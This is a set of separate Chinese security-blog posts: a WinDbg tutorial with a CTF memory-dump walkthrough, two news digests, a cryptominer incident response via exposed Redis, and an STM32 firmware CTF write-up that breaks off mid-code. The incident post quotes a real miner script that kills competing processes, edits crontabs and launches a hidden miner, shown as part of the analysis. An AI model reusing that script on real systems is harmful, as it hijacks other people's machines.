【WinDbg】学习以及在CTF中解题
1、WinDbg介绍 WinDbg是一款Windows强大的调试器,可以调试0和3环的程序。 在实际开发中,可以调试我们的错误程序,从而定位关键代码,进行程序代码修复。 WinDbg 是一种调试器工具,由微软公司开发,用于分析和调试 Windows 操作系统和应用程序。它提供了强大的调试功能,可以帮助开发人员识别和解决各种软件问题。 以下是 WinDbg 的一些主要特点和功能: 内核级和用户级调试支持: WinDbg 可以用于内核级别的调试(如 Windows 内核、驱动程序等)和用户级别的调试(如应用程序、DLL 等),使开发人员能够全面分析和调试整个系统栈。 符号和源代码支持: WinDbg 可以与符号文件(PDB 文件)结合使用,以获得更详细的调试信息,包括函数名、变量名和源代码行号等。这对于理解和追踪代码执行路径非常有帮助。 调试器扩展: WinDbg 支持通过扩展插件(例如 JavaScript 脚本)来增强其功能。这些扩展可以自定义命令、自动化任务、数据分析等,使调试过程更高效和灵活。 远程调试: WinDbg 支持在远程计算机上进行调试,这对于分析在另一台计算机上发生的问题非常有用。 内存分析: WinDbg 可以帮助分析内存转储文件(如 minidump、完全转储等),以了解程序崩溃或异常终止的原因。 性能分析: WinDbg 提供了一些性能分析工具和命令,可以帮助开发人员识别和解决性能瓶颈问题。 脚本和自动化: WinDbg 具有自己的脚本语言(类似于 JavaScript),允许开发人员编写脚本来执行自动化任务,例如批量调试、数据提取等。 WinDbg 是一款功能强大且灵活的调试器工具,可用于分析和解决各种 Windows 软件问题。它在软件开发、故障排除和性能优化方面都扮演着重要角色,并广泛应用于开发人员和系统管理员的工作中。 2、Windbg安装 Windbg 10需要下载WindowsSDK 然后进行安装即可。 安装这一步属于基础,按照搜索到的步骤进行安装即可 Windbg 10 自带了帮助文档 ‍ ‍3、dmp文件介绍 .dmp 文件是一种用于存储系统或应用程序崩溃时的信息的内存映射文件。 dmp 文件通常包含了在崩溃或异常事件发生时系统或应用程序的内部状态信息和堆栈跟踪信息,它们对于诊断问题和进行调试非常有用。 当程序运行到某些重大错误的时候,windows会帮我们生成一个.dmp文件,这里的dmp就是文件进程的内存镜像,可以把程序的执行状态通过调试器保存在其中。 可以使用任务管理器进行生成 创建转储文件,即可生成对应的dmp文件 ‍4、pdb文件介绍 .pdb 文件是用于存储调试信息的程序数据库文件。 pdb 文件包含了有关源代码的符号信息,如变量名称、函数名称、类型信息以及源代码文件和行号的映射。这使得调试器能够将二进制文件中的地址映射回源代码。 ‍5、Windbg基础命令 提供debugger.chm文件(下载安装Windbg10自带) assets/debugger-20231210184705-cedqbbl.chm 命令已经很全了,这里只总结常用的指令。 windbg的指令分成以下几类 标准命令 元命令 扩展指令 标准命令相当于是内建在windbg中的默认指令。 元命令则是提供给标准指令中没有的指令,调用时开头要加上. 符号。 扩展指令则是用于实现针对特定目标的调试功能,使用前要加上! 符号,其完整的调用格式为: !nameofExtentModule.nameofExtentCommand 参数 其中如果扩栈模块已经加载了,那么nameofExtentModule. 不是必须的,windbg会直接查找。 5.1 执行、调试相关 dt The dt command displays information about a local variable, global variable or data type. This can display information about simple data types, as well as structures and unions. dt命令看可以显示局部变量、全局变量或数据类型的信息。它也可以仅显示数据类型。即结构和联合(union)的信息。 #查看当前线程块 dt _teb d 查看数据 默认格式如下 d [type] [address range] d这个命令能够查看指定地址和内存的内容,其中常用的有dd(使用双字节来查看内存内容),如: dd 77400000 !peb 可以查看当前进程中的peb的基本情况。 bp The bp, bu, and bm commands set one or more software breakpoints. You can combine locations, conditions, and options to set different kinds of software breakpoints. 指令格式如下 bp <address> 常见的下断点的方式。对应的清除断点的方式为bc num,而列出断点的方法为bl g 最基本的指令,运行当前程序。 u 将指定的地址反汇编: u[u|b] address(.表示当前的程序执行地址)uu Address L[Length] 其中uu和ub可以指定当前反汇编的长度(暂时没看出什么区别,似乎是ub的话使用.会自动计算从函数开始的地址进行汇编)。可以使用以下的语法进行长度的指定 使用L表示后面的数字表示的是长度 r 查看当前的寄存器 同时可以修改当前的寄存器,比如说: r @eax=1 将当前的eax寄存器的值修改成1 ed ed # ed [address][content] 将当前的内存修改成指定值 例如 ed 08041000 11111111 将地址08041000处的内容修改成11111111 p 常见指令,单步步过。除此之外还有: p 2 // 2为步进数目 pc // 执行到下一个函数调用处停下 【Step to Next Call】 pa 7c801b0b // 执行到7c801b0b地址处停下 【Step to Adress】 t 单步步入 k 查看栈帧调用顺序 5.2 调试辅助相关 .sympath 表示当前的符号加载情况。符号能够帮助我们更加方便的分析程序。 .sympath+ D:\Filename 将D:\Filename添加到符号查找的路径中。 关于符号,其中lm 指令可以检查当前的文件中是否加载了符号文件: deffered:表示延迟绑定 pdb symbols:表示已经加载当前符号 .load .load dllname 导入指定名字的dll文件,常常用于导入插件 5.3 漏洞利用相关 !py mona mona 是一个好东西哈,可以用来生成ROP ,查找Gadget ,进行漏洞挖掘等等。 生成ROP Chain !py mona rop -m "module" 利用module生成ROP Chain ‍ 6、实战:windbg分析题目 这里使用了WindbgPreview来分析这道dmp 题目描述: 赛题描述:explorer.exe进程已经被木马感染了,现已经获取explorer.exe进程的dump文件,尝试从DUMP文件中找到flag 打开的效果: 使用第一条命令: !analyze -v !analyze -v 是 WinDbg 调试器中的一个命令,用于自动分析崩溃的原因。这个命令会执行一些步骤来帮助你找到崩溃的根本原因,包括输出调用栈、异常信息、可能引起问题的模块以及其他相关信息。 !analyze 是命令,-v表示详细输出的参数 发现没什么信息,尝试使用 命令 lm,列出当前加载的模块 根据题目描述,感觉像是注入了恶意dll 输出了很多结果 这里有个小技巧,加载了对应符号的pdb,可以先排除 这么多dll,怎么分析? 这里再教一个小技巧,系统dll的地址一般都很高。 这里就有一个很可疑的dll 地址这么低,和系统dll的地址显得格格不入 猜测这是可疑dll,使用命令进行分析 start    end        module name 10000000 1000e000   stolen     (deferred) 将光标移动到stolen,windbgpreview会输出一段信息: 或者运行命令: lmv m stolen lmv m 是 WinDbg 调试器中的一个命令,用于显示指定模块的详细信息。该命令可以帮助你查看模块的基地址、文件名、调试符号等信息。0:030> lmDvmstolen Browse full module list start    end        module name 10000000 1000e000   stolen     (deferred)              Image path: C:\Users\Administrator\Desktop\stolen.dll    Image name: stolen.dll    Browse all global symbols  functions  data    Timestamp:        Thu Apr 20 11:33:18 2017 (58F82BFE)    CheckSum:         0000E4F8    ImageSize:        0000E000    Translations:     0000.04b0 0000.04e4 0409.04b0 0409.04e4    Information from resource tables: 尝试寻找: C:\Users\Administrator\Desktop\stolen.dll 发现没有。。。 在内存中也没有数据,因为还没映射 那么我们就查看整个内存空间布局,看看能不能找到相应的映射数据,(在dll对应的范围内) !vadump !vadump 是 WinDbg 调试器中的一个命令,用于显示虚拟地址空间 (Virtual Address Space) 的详细信息。 该命令将输出当前进程的虚拟地址空间中每个 VAD(虚拟地址描述符)的信息。 VAD 是操作系统内核用于管理进程虚拟内存的数据结构之一。 通过使用 !vadump 命令,可以查看每个 VAD 的起始地址、结束地址、保护标志、镜像文件名等信息。 BaseAddress: 10001000 RegionSize:  000062f4 flag如下: flag{acaa16770db76c1ffb9cee51c3cabfcf} ‍
网络安全日报 2023年12月18日
1、伊朗OilRig组织部署3个新的恶意软件下载程序 https://www.welivesecurity.com/en/eset-research/oilrig-persistent-attacks-cloud-service-powered-downloaders/ 伊朗国家资助的威胁组织OilRig在 2022 年部署了三种不同的下载器恶意软件,以维持对位于以色列的受害者组织的持续访问。斯洛伐克网络安全公司 ESET 将这三个新下载程序命名为 ODAgent、OilCheck 和 OilBooster。这些攻击还涉及使用名为 SampleCheck5000(或 SC5k)的已知 OilRig 下载程序的更新版本。通过使用知名云服务提供商进 2、谷歌使用Clang Sanitizers保护安卓用户免受蜂窝基带漏洞的影响 https://security.googleblog.com/2023/12/hardening-cellular-basebands-in-android.html 谷歌强调Clang Sanitizers在强化移动基带安全性方面发挥的作用安卓操作系统,并防止特定类型的漏洞。这包括 Integer Overflow Sanitizer (IntSan) 和 BoundsSanitizer (BoundSan),两者都是 UndefinedBehaviorSanitizer (UBSan) 工具的一部分旨在捕获程序执行期间的各种未定义行为。它们与架构无关,适合裸机部署,并且应该在现有的 C 3、美国核研究实验室证实数据泄露影响超过四万条个人信息 https://apps.web.maine.gov/online/aeviewer/ME/40/ff925db5-9987-4a47-a5bc-a89c94f794f5.shtml 爱达荷国家实验室 (INL) 证实,攻击者上个月突破其基于云的 Oracle HCM HR 管理平台后,窃取了超过 45000 人的个人信息。INL 是美国能源部 (DOE) 17 个国家实验室之一,拥有 6,100 名研究人员和支持人员,从事国家安全和核研究。11 月 20 日,确认发生“网络安全数据泄露”事件。一天前,该事件影响了其异地 Oracle HCM 系统。作为正在进行的联合调查的一部分,CISA 4、新型NKAbuse恶意软件滥用NKN区块链进行隐秘通信 https://securelist.com/unveiling-nkabuse/111512/ 一种新的基于 Go 的多平台恶意软件被识别为“NKAbuse”是第一个滥用 NKN(新型网络)技术进行数据交换的恶意软件,使其成为一种隐形威胁。NKN 是一种相对较新的去中心化点对点网络协议,利用区块链技术来管理资源并维护安全透明的网络运营模型。NKN 的目标之一是优化整个网络的数据传输速度和延迟,这可以通过计算有效的数据包传输路径来实现。个人可以通过运行节点来参与NKN网络,类似于Tor网络,目前大约有60710个节点。 5、研究人员披露针对985个银行应用的10个新型安卓银行木马 https://www.zimperium.com/resources/zimperiums-2023-mobile-banking-heists-report-finds-29-malware-families-targeted-1800-banking-apps-across-61-countries-in-the-last-year/ 今年出现了 10 个新的 Android 银行恶意软件家族,这些恶意软件家族共同针对来自 61 个国家/地区的金融机构的 985 个银行和金融科技/交易应用程序。银行木马是一种恶意软件,通过窃取凭证和会话 cookie、绕过 2FA 保护、有时甚至自动执 6、Discord为所有用户添加了安全密钥支持以增强安全性 https://www.bleepingcomputer.com/news/security/discord-adds-security-key-support-for-all-users-to-enhance-security/ Discord 已为平台上的所有帐户提供安全密钥多重身份验证 (MFA),为其 5 亿多注册用户带来显着的安全和反网络钓鱼优势。这家热门社交平台于 2023 年 8 月首次强调了使用 WebAuthn 安全密钥的好处,当时它为其员工推出了额外的帐户保护。Discord 现已为所有 Discord 用户带来了 WebAuthn 功能,允许用户替换依赖基于时间的一次性 7、研究人员披露QR网络钓鱼可导致Microsoft 365帐户被盗 https://www.secureworks.com/blog/qr-phishing-leads-to-microsoft-365-account-compromise 事件响应人员调查了源自包含 PDF 附件的网络钓鱼电子邮件的网络入侵。该 PDF 包含一个 QR 码,可将收件人引导至星际文件系统 (IPFS) 网关上托管的恶意内容。使用此网关可以让威胁行为者节省与托管自己的基础设施相关的成本和精力,并使执法部门难以取缔恶意内容。使用移动设备扫描二维码会将受害者引导至特定 URL,该 URL 会窃取会话令牌并重定向到 ipfs 。 io 网关托管恶意登录页面以获取 Microsoft 8、研究人员披露UNC2975恶意广告部署后门活动 https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors 研究人员发现了一场 UNC2975 恶意广告活动,该活动宣传以无人认领资金为主题的恶意网站。该活动至少可以追溯到 2023 年 6 月 19 日,滥用搜索引擎流量并利用恶意广告影响多个组织,导致 DANABOT 和 DARKGATE 后门的传播。在这次 UNC2975 活动中,恶意网站传播了 PAPERDROP 和 PAPERTEAR 下载器恶意软件,最终导致 DANABOT 和 DARKGATE 后门恶意软件。 9、攻击者利用公开的漏洞利用代码针对Apache Struts漏洞发起攻击 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-apache-struts-flaw-using-public-poc/ 黑客正试图利用 Apache Struts 中最近修复的一个严重漏洞 (CVE-2023-50164),该漏洞会导致远程代码执行,从而进行依赖公开可用的概念验证漏洞利用代码的攻击。攻击者似乎才刚刚开始,该平台的研究人员观察到少数 IP 地址正在进行利用尝试。Apache Struts 是一个开源 Web 应用程序框架,旨在简化 Java EE Web 应用程序的开 10、卡夫亨氏回应黑客攻击事件称其系统正常运行 https://www.bleepingcomputer.com/news/security/kraft-heinz-investigates-hack-claims-says-systems-operating-normally/ 卡夫亨氏已确认他们的系统运行正常,并且没有证据表明他们在勒索组织将其列在数据泄露网站上后遭到破坏。卡夫亨氏是全球最大的食品和饮料公司之一,在 40 个国家/地区拥有超过 37000 名员工。该公司拥有众多知名品牌,包括 Oscar Mayer、Kool-Aid、Philadelphia、Lunchables、Maxwell House 等。在 Snatch 勒索 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
记一次挖矿病毒的溯源
ps:因为项目保密的原因部分的截图是自己在本地的环境复现。 1. 起因 客户打电话过来说,公司web服务异常卡顿。起初以为是web服务缓存过多导致,重启几次无果后觉得可能是受到了攻击。起初以为是ddos攻击,然后去查看web服务器管理面板时发现网络链接很少,但是cpu占用高达99%,于是便怀疑是中了挖矿病毒。 2.排查可疑进程 首先发现cpu占用率过高,初步怀疑是挖矿病毒。于是上ssh开始排查 使用top命令查看进程占用列表。发现并没有占用过高的程序,但是查询cpu占用率确实是99%。怀疑是隐藏了linux进程。 以为是做了进程隐藏,于是写了个python脚本遍历/proc目录。/proc目录是一个虚拟文件系统,用于提供有关系统内核和运行进程的信息。该目录中包含一系列以数字命名的子目录,每个子目录代表一个正在运行的进程。在这些子目录中,可以访问有关进程状态、内存使用情况、打开的文件列表等信息。 该脚本遍历proc目录,查询ps aux不显示的进程id,然后显示打印出来。 import os def get_max_pid():    pid_list = [int(pid) for pid in os.listdir('/proc') if pid.isdigit()]    return str(max(pid_list)) def get_existing_process_ids(max_pid):    process_ids = []    for pid in range(1, int(max_pid) + 1):        if os.path.exists('/proc/' + str(pid)):            process_ids.append(str(pid))    return process_ids def get_ps_aux_process_ids():    process_ids = []    output = os.popen('ps aux').read()    lines = output.split('n')    for line in lines[1:]:        if line.strip() != '':            pid = line.split()[1]            process_ids.append(pid)    return process_ids max_pid = get_max_pid() existing_process_ids = get_existing_process_ids(max_pid) ps_aux_process_ids = get_ps_aux_process_ids() for pid in existing_process_ids:    if pid not in ps_aux_process_ids:        print('Hidden PID {}'.format(pid)) emmmm, 但是效果不是很理想,有一大部分进程都是僵尸进程。 然后一个一个排查后效果不佳,并无发现什么可疑进程。 3 排查网络链接 于是打算从网络链接中入手,使用netstat-antp进行排查。发现有进程在链接47.130.146.28这个ip地址,然后拿这个ip地址反查域名。 发现是绑定的log.softgoldinformation.com这个域名。 然后搜索这个域名,发现之前也有人排查过了。 然后发现其实还有其他ip这里就不一一截图了。moneroocean,xmrig,kdevtmpfsi,mysqlserver等病毒基本上都有在链接。(服务器基本上已经中了n种病毒了。基本上与各种矿池都有链接。) 然后协商客户运维,设置只允许服务器访问国内ip地址,这一步主要是为了能通畅的链接ssh。因为挖矿病毒一般都是挖取xmr,xmr使用的基本上都是cpu,在挖矿进程链接不了矿池的情况下通常都不会产生cpu占用。果然禁止服务器出网后,cpu占用率就下来了。(也是为了防止服务器继续链接挖矿者的c2) 4 寻找漏洞 问过客户服务器有装什么软件,然后说是为了方便做web数据库的缓存,半个月之前装了redis。 使用ps aux|grep redis查看redis端口。 尝试空密码链接成功。基本确定入口点是redis。 5 补救措施 发现基本已经在跑着几个挖矿的病毒了。这里不确定能不能把后门排查完,只能和客户沟通说先排查一遍看看。(因为挖矿木马一般都会有后门,在清理挖矿程序后,后门会自动检查挖矿程序是否运行,如果不运行的话会重新下载一个挖矿程序然后再次运行。所以在完全清除挖矿程序后一段时间内,cpu占用率不飙升就可以说明清理成功。反之则说明挖矿病毒并未清理成功。) 首先查看一下定时任务。 发现并无异常。 cat /etc/crontab 然后查看tmp目录,发现有sh文件,这里抽取一个sh来分析,基本上/tmp出现这种都可以确定服务器被挖矿了。同理的还有/var/tmp目录。 ls -la /tmp 随便打开一个配置文件就能发现,攻击者的矿池地址和钱包地址。这种情况基本把tmp目录全部清除即可。 下面是一个solr的挖矿病毒脚本,这里只是kill掉了挖矿同行的进程和定时任务。 #!/bin/sh export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin while [ 1 ] do    killall /tmp/*    killall /var/tmp/*   crontab -l | sed '/195.3.146.118/d' | crontab -   crontab -l | sed '/cf.sh/d' | crontab -   crontab -l | sed '/xms/d' | crontab -   crontab -l | sed '/kwork.sh/d' | crontab -   crontab -l | sed '/cyberium/d' | crontab -   crontab -l | sed '/newdat/d' | crontab -    rm -f /tmp/*    ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'dbused' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %    ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep 'urlopen' | awk '{print $2}' | xargs -I % kill -9 %   pgrep JavaUpdate | xargs -I % kill -9 %   pgrep kinsing | xargs -I % kill -9 %   pgrep donate | xargs -I % kill -9 %   pgrep kdevtmpfsi | xargs -I % kill -9 %   pgrep trace | xargs -I % kill -9 %   pgrep sysupdate | xargs -I % kill -9 %   pgrep mysqlserver | xargs -I % kill -9 %    ps aux | grep -v grep | grep 'trace' | awk '{print $2}' | xargs -I % kill -9 %   pkill xmrig   pkill sysupdate   pkill sysguard   pkill kthreaddk   pkill networkservice   pkill kdevtmpfsi   pkill watchbog    p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')    name=""$p    if [ -z "$name" ]    then       pkill solrd        ps aux | grep -v grep | grep -v 'java|redis|weblogic|solr|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|aux|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %       nohup /tmp/.solr/solrd &>>/dev/null &        sleep 30       nohup /tmp/.solr/genshin &>>/dev/null &        sleep 30    else         :    fi done • 查看/etc/passwd 是否有恶意用户 cat /etc/passwd 查看ssh是否有后门用户 (因为是redis的洞 很有可能会写入sshkey) ls -la /root/.ssh/ 然后用clamscan扫描一遍 clamscan -r / 设置redis密码登录。(这一步是由客户人员配置) 然后删除tmp目录下的脚本文件 rm -rf /tmp/*.sh 6 脚本分析 这里抽取其中的一个sh脚本讲一下挖矿病毒逻辑,因为脚本较大,所以这里是抽取部分代码过一遍逻辑,实际上常见的挖矿病毒脚本基本都差不多是一个逻辑,所以这里抽取了一个。 首先脚本的逻辑是从kill掉其他挖矿同行进程开始 然后写了一个定时任务 然后判断目标系统位数,到http://94.103.87.71/去下载病毒程序 这也就是最终的病毒文件 果不其然 最后是自动清理本身 总结 这次事故主要是因为开发人员不懂安全,直接开放redis数据库在公网并且不设置登录密码。虽然是内网服务器但是万幸做好了隔离。不然挖矿病毒肯定会在内网进行传播。 ps:听说客户之后去问了开发小哥,开发小哥说随便在网上找的教程,教程上是这样配置的就直接复制粘贴上去。所以建议大家在配置东西的时候尽量去查一下文档。
网络安全日报 2023年12月15日
1、OAuth应用程序用于自动化BEC和加密货币挖矿攻击 https://www.microsoft.com/en-us/security/blog/2023/12/12/threat-actors-misuse-oauth-applications-to-automate-financially-driven-attacks/ Microsoft警告称,出于经济动机的威胁行为者正在使用OAuth应用程序来自动执行BEC和网络钓鱼攻击、推送垃圾邮件以及部署虚拟机进行加密挖矿。OAuth(开放授权的缩写)是一种开放标准,用于通过基于令牌的身份验证和授权,根据用户定义的权限授予应用程序对服务器资源的安全委派访问权限,而无需提供凭据。微软威胁情报专家最近 2、戴尔敦促客户修补 PowerProtect 产品中的漏洞 https://www.securityweek.com/dell-urges-customers-to-patch-vulnerabilities-in-powerprotect-products/ 戴尔敦促其PowerProtect产品的客户查看新发布的安全公告并修补一系列潜在的严重漏洞。漏洞影响 PowerProtect Data Domain (DD) 系列设备,这些设备旨在帮助组织大规模保护、管理和恢复数据。 APEX Protect Storage、PowerProtect DD Management Center、PowerProtect DP 系列设备和 PowerProte 3、微软破坏了创建了 7.5 亿个欺诈帐户的网络犯罪服务Storm-1152 https://www.securityweek.com/microsoft-disrupts-cybercrime-service-that-created-750-million-fraudulent-accounts/ 微软周三宣布破坏 Storm-1152,这是一个网络犯罪即服务 (CaaS) 生态系统,该生态系统创建了 7.5 亿个欺诈性 Microsoft 帐户,以支持网络钓鱼、身份盗窃和其他计划。 4、GambleForce 使用 SQL 注入攻击窃取亚太地区公司的数据 https://www.securityweek.com/new-threat-actor-uses-sql-injection-attacks-to-steal-data-from-apac-companies/ 威胁追踪和情报公司 Group-IB 报道,自 9 月以来,一个新的威胁行为者已针对 8 个国家(主要位于亚太地区)的 24 个组织发起攻击。名为 GambleForce,该黑客组织一直使用 SQL 注入并利用赌博组织的内容管理系统 (CMS) 中的漏洞、政府、零售和旅游部门,窃取敏感信息,包括用户凭证。该黑客组织完全依赖开源和其他公开可用的工具来进行初始访问、侦察和数据盗窃,并 5、Ubiquiti 用户声称可以访问其他人的设备 https://securityaffairs.com/155871/security/ubiquiti-wifi-products-issue.html Ubiquiti WiFi 产品的用户开始报告称,他们在登录自己的帐户时正在访问其他人的设备。 6、与俄罗斯有关的 APT29 针对 JETBRAINS TEAMCITY 服务器 https://securityaffairs.com/155846/apt/apt29-targeting-jetbrains-teamcity-servers.html 专家警告称,已观察到与俄罗斯有关的 APT29 组织以 JetBrains TeamCity 服务器为目标,以获取对目标网络的初始访问权限。利用了该缺陷CVE-2023 -42793 在 TeamCity 中执行多种恶意活动。 7、PyPI 存储库中发现 116 个恶意包可感染 Windows 和 Linux 系统 https://thehackernews.com/2023/12/116-malware-packages-found-on-pypi.html 网络安全研究人员在 Python 包索引 (PyPI) 存储库中发现了一组 116 个恶意包,这些包旨在通过自定义后门感染 Windows 和 Linux 系统。最终的有效负载是臭名昭著的W4SP Stealer的变体,或者是用于窃取加密货币的简单剪贴板监视器,或两者兼而有之。 8、索尼正在调查 Insomniac 子部门的勒索软件攻击事件 https://therecord.media/sony-investigating-ransomware-insomniac-games 索尼子公司 Insomniac Games 目前正在调查 Rhysida 团伙发起的勒索软件攻击事件,该团伙过去曾针对多个政府机构和医疗机构发起勒索软件攻击。 9、法国警方逮捕与 Hive 勒索软件有关的俄罗斯籍嫌疑人 https://www.bleepingcomputer.com/news/security/french-police-arrests-russian-suspect-linked-to-hive-ransomware/ 法国警方在巴黎逮捕了一名涉嫌帮助 Hive 勒索软件团伙洗钱的俄罗斯公民。嫌疑人因与从可疑来源接收数百万美元的数字钱包相关联而被捕。 10、2023 年 微软共修补了 909 个漏洞 http://www.anquan419.com/knews/24/6429.html Tenable Research 团队统计了 2023 年微软星期二补丁数据指出,2023 年微软共修补了 909 个漏洞,比2022 年的 917 个漏洞略微下降 0.87%。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
STM32在CTF中的应用和快速解题
题目给的是bin文件,基本上就是需要我们手动修复的固件逆向。 如果给的是hex文件,我们可能需要使用MKD进行动态调试 主要还是以做题为目的 详细的可以去看文档:https://pdf1.alldatasheet.com/datasheet-pdf/view/201596/STMICROELECTRONICS/STM32F103C8T6.html SVD文件下载:https://github.com/posborne/cmsis-svd 本文参考了网上多篇文章,最终汇总在一篇,对这道新的STM32题进行解题。 IDA分析设置 1、基础设置 STM32主要信息: 内核:ARM32位Cortex-M3 CPU ARM Little-endian Cortex-M架构属于ARMv7-M IDA32位打开 ARM little-endian ‍ 点击ok之后进入 flash的映射地址是 0x08000000 ~ 0x0807ffff (512KB) flash就是我们装代码的地方,也是STM32入口 下面这张图来自STM32中文参考手册 从这张表中,可以了解的信息是,在偏移4的位置存储的是RESET,并且是固定的。 Reset就是充电就会执行并进入的地方,因此将其当做固件入口 在IDA偏移为4的地方,按下“D”键进行转换 得到了RESET的地址:0x80004D1 可以看到为奇数,说明是thumb指令 按下 "G" 键进行跳转 然后神奇的一幕发生了 自动识别了很多函数 其实这没有固定的套路,我们跟踪跳转,一步一步的分析,最终会到达关键步骤 分析函数 :sub_8000260 发现爆红了,需要我们手动添加一些段 Flash Memory: 0x8000000 ~ 0x801FFFF (128K) SRAM: 0x20000000 ~ 0x20004FFF (20K) Peripherals: 0x40000000 ~ 0x40023400 ‍ 2、添加段-SRAM 单片机内存被总分为flash(rom)和sram(ram),flash里面的数据掉电可保存,sram中的数据掉电就丢失,sram的执行速度要快于flash,flash容量大于sram 单片机的程序存储分为code(代码存储区)、RO-data(只读数据存储区)、RW-data(读写数据存储区) 和 ZI-data(零初始化数据区) Flash 存储 code和RO-data Sram 存储 RW-data 和ZI-data 所以,SRAM段需要我们自己添加 [0x20000000,0x2000ffff] SRAM: 0x20000000 ~ 0x20004FFF (20K) 存放程序动态执行时的变量 ‍ ‍3、添加段-Peripherals Peripherals: 0x40000000 ~ 0x400234ff    #这里还是改为了0x400234ff 而不是 0x40023400 在实战中发现多有多余的爆红,因此范围扩大总没错 外设寄存器的映射地址,程序通过读写这些内存地址实现对外围设备的控制 Peripherals 段中包含了我们要了解的寄存器 ‍ 4、恢复中断向量表 地址0x8000000 -0x80000eb 存储了中断向量表的相关信息 使用python脚本,主要功能是删除旧的分析,添加dword类型分析 for i in range(0x8000000,0x80000eb,1): del_items(i) for i in range(0x8000000,0x80000eb,4): create_dword(i) print("ok") 可以看到均已恢复 修复完成后,发现了很多重复的地址,比如:0x8000519 这些函数并没有定义 跳转过去,将其全部生成对应的函数,使用(P 键) 官方图: ‍ 5、恢复符号 bindiff来恢复符号表 如果有闲工夫或者是对stm32的开发非常上手,就可以自己写一个demo,尽可能多的使用到各种库函数,然后编译出一个axf文件。我这里的话,由于好久没有用stm32了,开发起来有些生疏,所以就不自己手写了,我选择捡现成的项目,编译出axf文件 可以多选几个例程,能涵盖更多的库函数,将这些axf文件用IDA打开,然后生成idb文件。然后在我们的目标bin文件中,使用bindiff加载idb文件。 网上随便找一个,下载axf文件 选择一个idb文件,然后会出现这样一个比较界面: 选取similarity大的函数导入到bin文件中 导入之后实际上就能恢复大部分的函数名了。 ‍ ‍6、恢复外设 导入SVD文件,恢复外设结构 在IDA7.5以后,就自带SVD文件加载插件了,如下图: 打开之后如下: 我们可以自行下载相应的SVD文件,或者加载GitHub上的仓库,我这里选择自行下载然后在本地加载。 下载链接是这个: assets/stm32-svd-main-20231209212159-rbquvf5.zip选中想要加载的svd文件之后,IDA就会自动恢复bin文件中的外设结构,体现在伪代码中就是这样: (在这题中好像没什么用) ‍ ‍7、解题 基本上做完上面的操作后 STM32就能看了 进入main函数 继续分析 题目说的是要找key 但是发现Key没有值。。。也就是说要么动调要么爆破,给了密文,就差了key 因此写出解密脚本 先转换一下 int main() {      int  v19[8] = { 0 };    v19[0] = 0xF4DD0F64;    v19[1] = 0x5173B9F8;    v19[2] = 0xC7D238B2;    v19[3] = 0x9B9FCA8;    v19[4] = 0x286D3C51;    v19[5] = 0x429DE399;    v19[6] = 0x8084307B;    LOWORD(v19[7]) = 0x9175;    for (size_t i = 0; i < 8; i++)   {        for (size_t j = 0; j < 4; j++)       {            printf("%02x ", (v19[i] >> 8 * j)&0xff);       }   }    return 0; } ‍写出解密脚本: from itertools import product from Crypto.Cipher import ARC4 xorkey ="flag{tH14.l4_F@kKkEeeE---f41g}" enc = bytearray([0x64,0x0f,0xdd,0xf4,0xf8,0xb9,0x73,0x51,0xb2,0x38,0xd2,0xc7,0xa8,0xfc,0xb9,0x09,0x51,0x3c,0x6d,0x28,0x99,0xe3,0x9d,0x42,0x7b,0x30,0x84,0x80,0x75,0x91]) l = list(range(0x20,0x7f)) for k in product(l, repeat=4):    key = bytearray(k)    res = ARC4.new(key).decrypt(xorkey.encode())    if res == enc:        print('get')        print(key)        exit(0) 使用C语言爆破会更快 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <openssl/arc4.h> #define XOR_KEY "flag{tH14.l4_F@kKkEeeE---f41g}" #define ENC_SIZE 29 int main() {    uint8_t enc[ENC_SIZE] = {0x64, 0x0f, 0xdd, 0xf4, 0xf8, 0xb9, 0x73, 0x51, 0xb2, 0x38, 0xd2, 0xc7, 0xa8, 0xfc, 0xb9, 0x09, 0x51, 0x3c, 0x6d, 0x28, 0x99, 0xe3, 0x9d, 0x42, 0x7b, 0x30, 0x84, 0x80, 0x75, 0x91};    int l[] = {0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f,               0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d, 0x3e, 0x3f,               0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f,               0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5a, 0x5b, 0x5c, 0x5d, 0x5e, 0x5f,               0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f,               0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 